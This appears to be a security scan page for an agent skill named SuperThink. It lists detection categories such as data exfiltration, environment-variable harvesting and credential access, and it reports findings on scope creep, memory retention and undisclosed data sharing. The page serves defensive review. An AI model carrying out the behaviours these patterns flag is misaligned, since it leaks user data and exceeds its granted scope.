ClawHub

SuperThink

Security checks across malware telemetry and agentic risk

Overview

SuperThink is a disclosed research automation skill; its main risks are expected data sharing, cost, local retention, and optional notifications rather than hidden behavior.

Use a dedicated Anthropic API key if possible, expect API charges, and do not run sensitive research unless you are comfortable sending the topic and generated content to Anthropic. Leave webhook and Telegram variables unset unless you trust the destination, review any generated helper scripts before running them, and delete local outputs or memory notes when retention is not desired.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (4)

Description-Behavior Mismatch

Medium
Confidence
94% confidence
Finding
The skill is presented as a fully automatic research pipeline, but the supporting scripts are not actually part of the skill and the agent is instructed to implement them and perform environment setup. That expands the skill's effective scope from research orchestration into arbitrary code generation and local system modification, increasing the chance of unsafe file writes, insecure API handling, or execution of unreviewed support code.

Context-Inappropriate Capability

Low
Confidence
81% confidence
Finding
The instruction to update persistent memory/notes with topic slug, date, and key findings introduces unnecessary long-term retention of user-derived research data outside the primary output path. This creates avoidable privacy and data-minimization risk, especially if research topics include sensitive business, legal, or strategic information.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The skill sends user-supplied topic, scope, and generated documents to external services including Anthropic and optional notification endpoints, but it does not clearly warn users about that data flow. In a deep research workflow, the transmitted content may contain confidential strategy, legal, financial, or product information, so omission of an explicit disclosure materially increases privacy and compliance risk.

Missing User Warnings

Medium
Confidence
83% confidence
Finding
The spec encourages optional webhook and Telegram notifications but does not warn that job descriptions, result paths, and counts may be transmitted to third-party services. In the context of a research pipeline, job metadata can reveal sensitive topics, internal workflow details, or filesystem structure, creating a real data-leakage risk if operators enable these channels without understanding the exposure.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal